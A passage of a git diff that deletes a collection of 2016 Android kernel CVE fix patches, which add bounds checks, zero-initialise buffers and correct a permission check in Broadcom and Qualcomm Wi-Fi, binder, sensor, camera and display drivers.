-/hardware/broadcom/wlan/bcmdhd/wifi_hal/gscan.cpp
-where GSCAN_ATTRIBUTE_HOTLIST_BSSID_COUNT supposed to be called.
-
-Bug: 32474971
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Change-Id: Id2b019bb43fb99b3843fe1b32f59e58c7af7cdad
----
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 39 ++++++++++++++++++++++++------
- drivers/net/wireless/bcmdhd/wl_cfgvendor.h |  1 +
- 2 files changed, 32 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-index 420cb2f..3e80169 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -702,7 +702,7 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- 		GFP_KERNEL);
- 
- 	if (!hotlist_params) {
--		WL_ERR(("Cannot Malloc mem to parse config commands size - %d bytes \n", len));
-+		WL_ERR(("Cannot Malloc mem.\n"));
- 		return -ENOMEM;
- 	}
- 
-@@ -711,10 +711,33 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- 	nla_for_each_attr(iter, data, len, tmp2) {
- 		type = nla_type(iter);
- 		switch (type) {
-+		case GSCAN_ATTRIBUTE_HOTLIST_BSSID_COUNT:
-+			if (nla_len(iter) != sizeof(uint32)) {
-+				WL_DBG(("type:%d length:%d not matching.\n",
-+					type, nla_len(inner)));
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			hotlist_params->nbssid = (uint16)nla_get_u32(iter);
-+			if ((hotlist_params->nbssid == 0) ||
-+			    (hotlist_params->nbssid > PFN_SWC_MAX_NUM_APS)) {
-+				WL_ERR(("nbssid:%d exceed limit.\n",
-+					hotlist_params->nbssid));
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			break;
- 		case GSCAN_ATTRIBUTE_HOTLIST_BSSIDS:
-+			if (hotlist_params->nbssid == 0) {
-+				WL_ERR(("nbssid not retrieved.\n"));
-+				err = -EINVAL;
-+				goto exit;
-+			}
- 			pbssid = hotlist_params->bssid;
- 			nla_for_each_nested(outer, iter, tmp) {
- 				nla_for_each_nested(inner, outer, tmp1) {
-+					if (j >= hotlist_params->nbssid)
-+						break;
- 					type = nla_type(inner);
- 
- 					switch (type) {
-@@ -751,13 +774,13 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- 						break;
- 					}
- 				}
--				if (++j > PFN_SWC_MAX_NUM_APS) {
--					WL_DBG(("nbssid:%d exeed limit.\n",
--						hotlist_params->nbssid));
--					err = -EINVAL;
--					goto exit;
--				}
--				hotlist_params->nbssid = j;
-+				j++;
-+			}
-+			if (j != hotlist_params->nbssid) {
-+				WL_ERR(("bssid_cnt:%d != nbssid:%d.\n", j,
-+					hotlist_params->nbssid));
-+				err = -EINVAL;
-+				goto exit;
- 			}
- 			break;
- 		case GSCAN_ATTRIBUTE_HOTLIST_FLUSH:
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.h b/drivers/net/wireless/bcmdhd/wl_cfgvendor.h
-index 58077b3..7d33c62 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.h
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.h
-@@ -181,6 +181,7 @@ enum gscan_attributes {
-     GSCAN_ATTRIBUTE_RSSI_HIGH,
-     GSCAN_ATTRIBUTE_HOSTLIST_BSSID_ELEM,
-     GSCAN_ATTRIBUTE_HOTLIST_FLUSH,
-+    GSCAN_ATTRIBUTE_HOTLIST_BSSID_COUNT,
- 
-     /* remaining reserved for additional attributes */
-     GSCAN_ATTRIBUTE_RSSI_SAMPLE_SIZE = 60,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8466/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-8466/3.10/0001.patch
deleted file mode 100644
index d024359b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8466/3.10/0001.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 67d429b1cb87879c33df58febc0b7bf6712bc7c0 Mon Sep 17 00:00:00 2001
-From: Ram Sripathi <ram.sripathi@broadcom.com>
-Date: Fri, 4 Nov 2016 15:44:14 -0700
-Subject: [PATCH] net: wireless: bcmdhd: Heap over write in
- dhdmsgbuf_query_ioctl
-
-handled heap overwrite with checks
-
-Change-Id: I9e9bc97a3f410d40d9bc6a44707a6c0f8917cd31
-Bug: 31822524
-Signed-off-by: Ram Sripathi <ram.sripathi@broadcom.com>
----
- drivers/net/wireless/bcmdhd/dhd_msgbuf.c | 28 +++++++++++++++-------------
- 1 file changed, 15 insertions(+), 13 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_msgbuf.c b/drivers/net/wireless/bcmdhd/dhd_msgbuf.c
-index cb5018c52f10b..90f9733a7e36c 100644
---- a/drivers/net/wireless/bcmdhd/dhd_msgbuf.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_msgbuf.c
-@@ -2612,22 +2612,24 @@ static int
- dhdmsgbuf_query_ioctl(dhd_pub_t *dhd, int ifidx, uint cmd, void *buf, uint len, uint8 action)
- {
- 	dhd_prot_t *prot = dhd->prot;
--
- 	int ret = 0;
- 
--	DHD_TRACE(("%s: Enter\n", __FUNCTION__));
--
--	/* Respond "bcmerror" and "bcmerrorstr" with local cache */
--	if (cmd == WLC_GET_VAR && buf)
--	{
--		if (!strcmp((char *)buf, "bcmerrorstr"))
--		{
--			strncpy((char *)buf, bcmerrorstr(dhd->dongle_error), BCME_STRLEN);
-+	DHD_TRACE(("%s: Enter\n", __func__));
-+	if (!buf || !len) {
-+		DHD_ERROR(("%s(): Zero length bailing\n", __func__));
-+		ret = BCME_BADARG;
-+		goto done;
-+	}
-+	if (cmd == WLC_GET_VAR) {
-+		/* Respond "bcmerror" and "bcmerrorstr" with local cache */
-+		if ((len > strlen("bcmerrorstr")) &&
-+		    !strcmp(buf, "bcmerrorstr")) {
-+			strlcpy(buf, bcmerrorstr(dhd->dongle_error), len);
- 			goto done;
--		}
--		else if (!strcmp((char *)buf, "bcmerror"))
--		{
--			*(int *)buf = dhd->dongle_error;
-+		} else if ((len > strlen("bcmerror")) &&
-+			   !strcmp(buf, "bcmerror")) {
-+			memcpy(buf, &dhd->dongle_error,
-+			       sizeof(dhd->dongle_error));
- 			goto done;
- 		}
- 	}
diff --git a/Patches/Linux_CVEs/CVE-2016-8466/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-8466/3.18/0002.patch
deleted file mode 100644
index 49762309..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8466/3.18/0002.patch
+++ /dev/null
@@ -1,59 +0,0 @@
-From 4af032a458109027c88c478c800aac97a7105250 Mon Sep 17 00:00:00 2001
-From: Ram Sripathi <ram.sripathi@broadcom.com>
-Date: Fri, 4 Nov 2016 15:44:14 -0700
-Subject: net: wireless: bcmdhd: Heap over write in dhdmsgbuf_query_ioctl
-
-handled heap overwrite with checks
-
-Signed-off-by: Ram Sripathi <ram.sripathi@broadcom.com>
-Bug: 31822524
-Change-Id: I9e9bc97a3f410d40d9bc6a44707a6c0f8917cd31
----
- drivers/net/wireless/bcmdhd/dhd_msgbuf.c | 28 +++++++++++++++-------------
- 1 file changed, 15 insertions(+), 13 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_msgbuf.c b/drivers/net/wireless/bcmdhd/dhd_msgbuf.c
-index 8d7d4bf..e6e2848 100644
---- a/drivers/net/wireless/bcmdhd/dhd_msgbuf.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_msgbuf.c
-@@ -2493,22 +2493,24 @@ static int
- dhdmsgbuf_query_ioctl(dhd_pub_t *dhd, int ifidx, uint cmd, void *buf, uint len, uint8 action)
- {
- 	dhd_prot_t *prot = dhd->prot;
--
- 	int ret = 0;
- 
--	DHD_TRACE(("%s: Enter\n", __FUNCTION__));
--
--	/* Respond "bcmerror" and "bcmerrorstr" with local cache */
--	if (cmd == WLC_GET_VAR && buf)
--	{
--		if (!strcmp((char *)buf, "bcmerrorstr"))
--		{
--			strncpy((char *)buf, bcmerrorstr(dhd->dongle_error), BCME_STRLEN);
-+	DHD_TRACE(("%s: Enter\n", __func__));
-+	if (!buf || !len) {
-+		DHD_ERROR(("%s(): Zero length bailing\n", __func__));
-+		ret = BCME_BADARG;
-+		goto done;
-+	}
-+	if (cmd == WLC_GET_VAR) {
-+		/* Respond "bcmerror" and "bcmerrorstr" with local cache */
-+		if ((len > strlen("bcmerrorstr")) &&
-+		    !strcmp(buf, "bcmerrorstr")) {
-+			strlcpy(buf, bcmerrorstr(dhd->dongle_error), len);
- 			goto done;
--		}
--		else if (!strcmp((char *)buf, "bcmerror"))
--		{
--			*(int *)buf = dhd->dongle_error;
-+		} else if ((len > strlen("bcmerror")) &&
-+			   !strcmp(buf, "bcmerror")) {
-+			memcpy(buf, &dhd->dongle_error,
-+			       sizeof(dhd->dongle_error));
- 			goto done;
- 		}
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8468/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2016-8468/3.18/0001.patch
deleted file mode 100644
index 97434d64..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8468/3.18/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 0d37d64f02e18a301867ae7684c3801bd99c5df2 Mon Sep 17 00:00:00 2001
-From: Martijn Coenen <maco@android.com>
-Date: Tue, 8 Nov 2016 20:12:16 +0100
-Subject: [PATCH] Android: binder: check set_context_mgr permission on time.
-
-Bug: 32394425
-Change-Id: I860c6aab97850bff05a56e96cd3f4b41691bfd96
-Signed-off-by: Martijn Coenen <maco@android.com>
----
- drivers/staging/android/binder.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/staging/android/binder.c b/drivers/staging/android/binder.c
-index ad902dbac8fa5..56f9713de523c 100644
---- a/drivers/staging/android/binder.c
-+++ b/drivers/staging/android/binder.c
-@@ -2784,6 +2784,9 @@ static int binder_ioctl_set_ctx_mgr(struct file *filp)
- 		ret = -EBUSY;
- 		goto out;
- 	}
-+	ret = security_binder_set_context_mgr(proc->tsk);
-+	if (ret < 0)
-+		goto out;
- 	if (uid_valid(binder_context_mgr_uid)) {
- 		if (!uid_eq(binder_context_mgr_uid, curr_euid)) {
- 			pr_err("BINDER_SET_CONTEXT_MGR bad uid %d != %d\n",
-@@ -2849,9 +2852,6 @@ static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 		ret = binder_ioctl_set_ctx_mgr(filp);
- 		if (ret)
- 			goto err;
--		ret = security_binder_set_context_mgr(proc->tsk);
--		if (ret < 0)
--			goto err;
- 		break;
- 	case BINDER_THREAD_EXIT:
- 		binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",
diff --git a/Patches/Linux_CVEs/CVE-2016-8473/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8473/ANY/0001.patch
deleted file mode 100644
index 8acfa4c8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8473/ANY/0001.patch
+++ /dev/null
@@ -1,46 +0,0 @@
-From 900b8b72c57cefebb39c150dfddfdd493a1cea79 Mon Sep 17 00:00:00 2001
-From: Steve Pfetsch <spfetsch@google.com>
-Date: Mon, 7 Nov 2016 16:20:11 -0800
-Subject: [PATCH] input: ldaf: Initialize buffers before use.
-
-Prevent writing uninitialized stack data to calibration files by
-zeroing out buffers upon creation.
-
-Bug: 31799972
-Bug: 31795790
-Change-Id: Ic848d4d1e181818f461e4b61ad73ada28a474bd1
----
- drivers/input/misc/vl6180/stmvl6180_module.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/input/misc/vl6180/stmvl6180_module.c b/drivers/input/misc/vl6180/stmvl6180_module.c
-index c61cc0f063424..78bc7f6844c33 100755
---- a/drivers/input/misc/vl6180/stmvl6180_module.c
-+++ b/drivers/input/misc/vl6180/stmvl6180_module.c
-@@ -107,7 +107,7 @@ static int stmvl6180_stop(struct stmvl6180_data *data);
- static void stmvl6180_read_calibration_file(void)
- {
- 	struct file *f;
--	char buf[8];
-+	char buf[8] = {0};
- 	mm_segment_t fs;
- 	int i, is_sign = 0;
- 
-@@ -184,7 +184,7 @@ static void stmvl6180_read_calibration_file(void)
- static void stmvl6180_write_offset_calibration_file(void)
- {
- 	struct file *f = NULL;
--	char buf[8];
-+	char buf[8] = {0};
- 	mm_segment_t fs;
- 
- 	f = filp_open(CAL_FILE_OFFSET, O_CREAT | O_TRUNC | O_RDWR,
-@@ -207,7 +207,7 @@ static void stmvl6180_write_offset_calibration_file(void)
- static void stmvl6180_write_xtalk_calibration_file(void)
- {
- 	struct file *f = NULL;
--	char buf[8];
-+	char buf[8] = {0};
- 	mm_segment_t fs;
- 
- 	f = filp_open(CAL_FILE_XTALK, O_CREAT | O_TRUNC | O_RDWR,
diff --git a/Patches/Linux_CVEs/CVE-2016-8474/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8474/ANY/0001.patch
deleted file mode 100644
index 8acfa4c8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8474/ANY/0001.patch
+++ /dev/null
@@ -1,46 +0,0 @@
-From 900b8b72c57cefebb39c150dfddfdd493a1cea79 Mon Sep 17 00:00:00 2001
-From: Steve Pfetsch <spfetsch@google.com>
-Date: Mon, 7 Nov 2016 16:20:11 -0800
-Subject: [PATCH] input: ldaf: Initialize buffers before use.
-
-Prevent writing uninitialized stack data to calibration files by
-zeroing out buffers upon creation.
-
-Bug: 31799972
-Bug: 31795790
-Change-Id: Ic848d4d1e181818f461e4b61ad73ada28a474bd1
----
- drivers/input/misc/vl6180/stmvl6180_module.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/input/misc/vl6180/stmvl6180_module.c b/drivers/input/misc/vl6180/stmvl6180_module.c
-index c61cc0f063424..78bc7f6844c33 100755
---- a/drivers/input/misc/vl6180/stmvl6180_module.c
-+++ b/drivers/input/misc/vl6180/stmvl6180_module.c
-@@ -107,7 +107,7 @@ static int stmvl6180_stop(struct stmvl6180_data *data);
- static void stmvl6180_read_calibration_file(void)
- {
- 	struct file *f;
--	char buf[8];
-+	char buf[8] = {0};
- 	mm_segment_t fs;
- 	int i, is_sign = 0;
- 
-@@ -184,7 +184,7 @@ static void stmvl6180_read_calibration_file(void)
- static void stmvl6180_write_offset_calibration_file(void)
- {
- 	struct file *f = NULL;
--	char buf[8];
-+	char buf[8] = {0};
- 	mm_segment_t fs;
- 
- 	f = filp_open(CAL_FILE_OFFSET, O_CREAT | O_TRUNC | O_RDWR,
-@@ -207,7 +207,7 @@ static void stmvl6180_write_offset_calibration_file(void)
- static void stmvl6180_write_xtalk_calibration_file(void)
- {
- 	struct file *f = NULL;
--	char buf[8];
-+	char buf[8] = {0};
- 	mm_segment_t fs;
- 
- 	f = filp_open(CAL_FILE_XTALK, O_CREAT | O_TRUNC | O_RDWR,
diff --git a/Patches/Linux_CVEs/CVE-2016-8475/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8475/ANY/0001.patch
deleted file mode 100644
index ade51786..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8475/ANY/0001.patch
+++ /dev/null
@@ -1,27 +0,0 @@
-From d906945fc287f9df48b99349fea962b921d4d39e Mon Sep 17 00:00:00 2001
-From: matt_huang <matt_huang@htc.com>
-Date: Mon, 7 Nov 2016 16:22:57 +0800
-Subject: [PATCH] input: misc: fix security vulnerability
-
-initialize the structure before using
-Bug: 32591129
-
-Change-Id: I9a3af40175d929009522f6c93005d82535c4ccc3
-Signed-off-by: matt_huang <matt_huang@htc.com>
----
- drivers/input/misc/vl53L0/stmvl53l0_module.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/input/misc/vl53L0/stmvl53l0_module.c b/drivers/input/misc/vl53L0/stmvl53l0_module.c
-index 0028e527857f5..cc27309fc4e20 100644
---- a/drivers/input/misc/vl53L0/stmvl53l0_module.c
-+++ b/drivers/input/misc/vl53L0/stmvl53l0_module.c
-@@ -2483,6 +2483,8 @@ static int stmvl53l0_ioctl_handler(struct file *file,
-                 if (!data->enable_ps_sensor)
-                     stmvl53l0_start(data, 3, NORMAL_MODE);
- 
-+                memset(&RangingMeasurementData, 0, sizeof(RangingMeasurementData));
-+
-                 for (i = 0; i < RANGE_MEASUREMENT_TIMES;)
-                 {
-                     Status = papi_func_tbl->PerformSingleRangingMeasurement(vl53l0_dev, &RangingMeasurementData);
diff --git a/Patches/Linux_CVEs/CVE-2016-8476/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-8476/qcacld-2.0/0001.patch
deleted file mode 100644
index 43e0e974..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8476/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From bfe8035bce6fec72ed1d064b94529fce8fb09799 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Fri, 18 Nov 2016 08:04:08 -0800
-Subject: qcacld-2.0: Validate "set passpoint list" network count
-
-Currently when processing the "set passpoint list" vendor command the
-"number of networks" parameter is not limit checked. This value is
-subsequently used to calculate the size of a buffer. Add a limit check
-to ensure that an appropriately sized buffer is always allocated.
-
-Change-Id: Ibc2346b8a62898fc47e2d1efe457c57c08b0cada
-CRs-Fixed: 1091940
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 7 ++++++-
- CORE/MAC/inc/sirApi.h            | 1 +
- 2 files changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 77a3ae9..a2ff8fe 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -5246,8 +5246,13 @@ static int __wlan_hdd_cfg80211_set_passpoint_list(struct wiphy *wiphy,
- 	}
- 	num_networks = nla_get_u32(
- 		tb[QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM]);
--	hddLog(LOG1, FL("num networks %u"), num_networks);
-+	if (num_networks > SIR_PASSPOINT_LIST_MAX_NETWORKS) {
-+		hddLog(LOGE, FL("num networks %u exceeds max %u"),
-+		       num_networks, SIR_PASSPOINT_LIST_MAX_NETWORKS);
-+		return -EINVAL;
-+	}
- 
-+	hddLog(LOG1, FL("num networks %u"), num_networks);
- 	req_msg = vos_mem_malloc(sizeof(*req_msg) +
- 			(num_networks * sizeof(req_msg->networks[0])));
- 	if (!req_msg) {
-diff --git a/CORE/MAC/inc/sirApi.h b/CORE/MAC/inc/sirApi.h
-index c5074d2..fd0adb2 100644
---- a/CORE/MAC/inc/sirApi.h
-+++ b/CORE/MAC/inc/sirApi.h
-@@ -5773,6 +5773,7 @@ struct wifi_epno_params
- 	struct wifi_epno_network networks[];
- };
- 
-+#define SIR_PASSPOINT_LIST_MAX_NETWORKS 8
- #define SIR_PASSPOINT_REALM_LEN 256
- #define SIR_PASSPOINT_ROAMING_CONSORTIUM_ID_NUM 16
- #define SIR_PASSPOINT_PLMN_LEN 3
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8477/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-8477/3.10/0001.patch
deleted file mode 100644
index 9501aef2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8477/3.10/0001.patch
+++ /dev/null
@@ -1,65 +0,0 @@
-From 33c9042e38506b04461fa99e304482bc20923508 Mon Sep 17 00:00:00 2001
-From: guyang <guyang@codeaurora.org>
-Date: Tue, 6 Dec 2016 18:30:38 +0800
-Subject: msm: camera: sensor: Validate eeprom_name string length
-
-Validate eeprom_name string length before copying into
-the userspace buffer.
-If more data than required is copied, userspace has the access to
-some of kernel data which is not intended.
-
-CRs-Fixed: 1090007
-Change-Id: Id40a287e0b1a93cc15d9b02c757fe9f347e285f2
-Signed-off-by: Rajesh Bondugula <rajeshb@codeaurora.org>
-Signed-off-by: VijayaKumar T M <vtmuni@codeaurora.org>
-Signed-off-by: Yang Guang <guyang@codeaurora.org>
----
- .../media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c   | 11 +++++++++--
- include/media/msm_cam_sensor.h                                |  2 +-
- 2 files changed, 10 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-index 059780d..13ad58e 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-@@ -140,15 +140,22 @@ static int msm_eeprom_config(struct msm_eeprom_ctrl_t *e_ctrl,
- 	struct msm_eeprom_cfg_data *cdata =
- 		(struct msm_eeprom_cfg_data *)argp;
- 	int rc = 0;
-+	size_t length = 0;
- 
- 	CDBG("%s E\n", __func__);
- 	switch (cdata->cfgtype) {
- 	case CFG_EEPROM_GET_INFO:
- 		CDBG("%s E CFG_EEPROM_GET_INFO\n", __func__);
- 		cdata->is_supported = e_ctrl->is_supported;
-+		length = strlen(e_ctrl->eboard_info->eeprom_name) + 1;
-+		if (length > MAX_EEPROM_NAME) {
-+			pr_err("%s:%d invalid eeprom_name length %d\n",
-+				__func__,__LINE__, (int)length);
-+			rc = -EINVAL;
-+			break;
-+		}
- 		memcpy(cdata->cfg.eeprom_name,
--			e_ctrl->eboard_info->eeprom_name,
--			sizeof(cdata->cfg.eeprom_name));
-+			e_ctrl->eboard_info->eeprom_name, length);
- 		break;
- 	case CFG_EEPROM_GET_CAL_DATA:
- 		CDBG("%s E CFG_EEPROM_GET_CAL_DATA\n", __func__);
-diff --git a/include/media/msm_cam_sensor.h b/include/media/msm_cam_sensor.h
-index 9497875..7ff89a4 100644
---- a/include/media/msm_cam_sensor.h
-+++ b/include/media/msm_cam_sensor.h
-@@ -446,7 +446,7 @@ struct msm_eeprom_cfg_data {
- 	enum eeprom_cfg_type_t cfgtype;
- 	uint8_t is_supported;
- 	union {
--		char eeprom_name[MAX_SENSOR_NAME];
-+		char eeprom_name[MAX_EEPROM_NAME];
- 		struct eeprom_get_t get_data;
- 		struct eeprom_read_t read_data;
- 		struct eeprom_write_t write_data;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8477/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-8477/3.18/0002.patch
deleted file mode 100644
index f1f00026..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8477/3.18/0002.patch
+++ /dev/null
@@ -1,92 +0,0 @@
-From 96145eb5f0631f0e105d47abebc8f940f7621eeb Mon Sep 17 00:00:00 2001
-From: Rajesh Bondugula <rajeshb@codeaurora.org>
-Date: Tue, 15 Nov 2016 13:52:49 -0800
-Subject: msm: camera: sensor: Validate eeprom_name string length
-
-Validate eeprom_name string length before copying into
-the userspace buffer.
-If more data than required is copied, userspace has the access to
-some of kernel data which is not intended.
-
-This change will fix the issue.
-
-CRs-Fixed: 1090007
-Signed-off-by: Rajesh Bondugula <rajeshb@codeaurora.org>
-Change-Id: Id40a287e0b1a93cc15d9b02c757fe9f347e285f2
----
- .../msm/camera_v2/sensor/eeprom/msm_eeprom.c       | 22 ++++++++++++++++++----
- include/uapi/media/msm_cam_sensor.h                |  2 +-
- 2 files changed, 19 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-index 1f891ac..037e8b5 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-@@ -617,6 +617,7 @@ static int msm_eeprom_config(struct msm_eeprom_ctrl_t *e_ctrl,
- 	struct msm_eeprom_cfg_data *cdata =
- 		(struct msm_eeprom_cfg_data *)argp;
- 	int rc = 0;
-+	size_t length = 0;
- 
- 	CDBG("%s E\n", __func__);
- 	switch (cdata->cfgtype) {
-@@ -629,9 +630,15 @@ static int msm_eeprom_config(struct msm_eeprom_ctrl_t *e_ctrl,
- 		}
- 		CDBG("%s E CFG_EEPROM_GET_INFO\n", __func__);
- 		cdata->is_supported = e_ctrl->is_supported;
-+		length = strlen(e_ctrl->eboard_info->eeprom_name) + 1;
-+		if (length > MAX_EEPROM_NAME) {
-+			pr_err("%s:%d invalid eeprom_name length %d\n",
-+				__func__, __LINE__, (int)length);
-+			rc = -EINVAL;
-+			break;
-+		}
- 		memcpy(cdata->cfg.eeprom_name,
--			e_ctrl->eboard_info->eeprom_name,
--			sizeof(cdata->cfg.eeprom_name));
-+			e_ctrl->eboard_info->eeprom_name, length);
- 		break;
- 	case CFG_EEPROM_GET_CAL_DATA:
- 		CDBG("%s E CFG_EEPROM_GET_CAL_DATA\n", __func__);
-@@ -1479,6 +1486,7 @@ static int msm_eeprom_config32(struct msm_eeprom_ctrl_t *e_ctrl,
- 	struct msm_eeprom_cfg_data32 *cdata =
- 		(struct msm_eeprom_cfg_data32 *)argp;
- 	int rc = 0;
-+	size_t length = 0;
- 
- 	CDBG("%s E\n", __func__);
- 	switch (cdata->cfgtype) {
-@@ -1491,9 +1499,15 @@ static int msm_eeprom_config32(struct msm_eeprom_ctrl_t *e_ctrl,
- 		}
- 		CDBG("%s E CFG_EEPROM_GET_INFO\n", __func__);
- 		cdata->is_supported = e_ctrl->is_supported;
-+		length = strlen(e_ctrl->eboard_info->eeprom_name) + 1;
-+		if (length > MAX_EEPROM_NAME) {
-+			pr_err("%s:%d invalid eeprom_name length %d\n",
-+				__func__, __LINE__, (int)length);
-+			rc = -EINVAL;
-+			break;
-+		}
- 		memcpy(cdata->cfg.eeprom_name,
--			e_ctrl->eboard_info->eeprom_name,
--			sizeof(cdata->cfg.eeprom_name));
-+			e_ctrl->eboard_info->eeprom_name, length);
- 		break;
- 	case CFG_EEPROM_GET_CAL_DATA:
- 		CDBG("%s E CFG_EEPROM_GET_CAL_DATA\n", __func__);
-diff --git a/include/uapi/media/msm_cam_sensor.h b/include/uapi/media/msm_cam_sensor.h
-index 540a96c..b8f4b41 100644
---- a/include/uapi/media/msm_cam_sensor.h
-+++ b/include/uapi/media/msm_cam_sensor.h
-@@ -290,7 +290,7 @@ struct msm_eeprom_cfg_data {
- 	enum eeprom_cfg_type_t cfgtype;
- 	uint8_t is_supported;
- 	union {
--		char eeprom_name[MAX_SENSOR_NAME];
-+		char eeprom_name[MAX_EEPROM_NAME];
- 		struct eeprom_get_t get_data;
- 		struct eeprom_read_t read_data;
- 		struct eeprom_write_t write_data;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8478/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8478/ANY/0001.patch
deleted file mode 100644
index b08ceefb..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8478/ANY/0001.patch
+++ /dev/null
@@ -1,73 +0,0 @@
-From e3af5e89426f1c8d4e703d415eff5435b925649f Mon Sep 17 00:00:00 2001
-From: Benet Clark <benetc@codeaurora.org>
-Date: Thu, 10 Nov 2016 17:49:09 -0800
-Subject: msm: mdss: Clear compat structures before copying to user
-
-In the compat layer, the temporary structures used to convert
-data from 32bit to 64bit structures need to be set to 0 before
-being assigned values.
-
-CRs-Fixed: 1088206
-Change-Id: I04497bc11e01c3df4beadfd6d9b06ab4321f1723
-Signed-off-by: Benet Clark <benetc@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_compat_utils.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index 5ad51dd..a9ab5c1 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
-@@ -846,6 +846,7 @@ static int __from_user_pcc_coeff_v17(
- 		return -EFAULT;
- 	}
- 
-+	memset(&pcc_cfg_payload, 0, sizeof(pcc_cfg_payload));
- 	pcc_cfg_payload.r.b = pcc_cfg_payload32.r.b;
- 	pcc_cfg_payload.r.g = pcc_cfg_payload32.r.g;
- 	pcc_cfg_payload.r.c = pcc_cfg_payload32.r.c;
-@@ -1127,6 +1128,8 @@ static int __from_user_igc_lut_data_v17(
- 		pr_err("failed to copy payload from user for igc\n");
- 		return -EFAULT;
- 	}
-+
-+	memset(&igc_cfg_payload, 0, sizeof(igc_cfg_payload));
- 	igc_cfg_payload.c0_c1_data = compat_ptr(igc_cfg_payload_32.c0_c1_data);
- 	igc_cfg_payload.c2_data = compat_ptr(igc_cfg_payload_32.c2_data);
- 	igc_cfg_payload.len = igc_cfg_payload_32.len;
-@@ -1261,6 +1264,7 @@ static int __from_user_pgc_lut_data_v1_7(
- 		pr_err("failed to copy from user the pgc32 payload\n");
- 		return -EFAULT;
- 	}
-+	memset(&pgc_cfg_payload, 0, sizeof(pgc_cfg_payload));
- 	pgc_cfg_payload.c0_data = compat_ptr(pgc_cfg_payload_32.c0_data);
- 	pgc_cfg_payload.c1_data = compat_ptr(pgc_cfg_payload_32.c1_data);
- 	pgc_cfg_payload.c2_data = compat_ptr(pgc_cfg_payload_32.c2_data);
